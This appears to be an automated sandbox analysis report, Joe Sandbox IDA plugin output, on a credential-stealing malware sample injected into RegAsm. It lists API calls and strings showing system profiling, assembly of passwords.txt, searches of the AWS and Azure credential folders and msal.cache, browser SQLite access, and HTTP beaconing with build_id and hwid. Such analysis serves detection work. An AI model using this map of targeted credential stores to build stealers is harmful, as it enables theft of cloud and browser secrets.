Computer Name: , xrefs: 00413FAD
TimeZone: , xrefs: 004141AC
MachineID: , xrefs: 00413C80
Windows: , xrefs: 00413E70

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 681701770-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
ERROR, xrefs: 00416BD6
ERROR, xrefs: 00416B51
.vA, xrefs: 00416D1D
ERROR, xrefs: 00416BC0
ERROR, xrefs: 00416A98
sqlp.dll, xrefs: 00416CCD
ERROR, xrefs: 00416BAA
sqlp.dll, xrefs: 00416CFE
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
sqlite3.dll, xrefs: 00416C9C
ERROR, xrefs: 00416AF1
ERROR, xrefs: 00416BE8
sqlite3.dll, xrefs: 00416C68

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

8wA, xrefs: 00405222
build_id, xrefs: 0040500D
", xrefs: 00405039
------, xrefs: 00404C75
hwid, xrefs: 00404EAD
------, xrefs: 00404F5B
------, xrefs: 00404DFB
", xrefs: 00404ED9

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

\.aws\, xrefs: 00416589
*.*, xrefs: 00416536
\.azure\, xrefs: 00416512
msal.cache, xrefs: 0041661E
Azure\.azure, xrefs: 00416531
Azure\.IdentityService, xrefs: 00416619
Azure\.aws, xrefs: 004165A5
*.*, xrefs: 004165AA
\.IdentityService\, xrefs: 004165FD

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
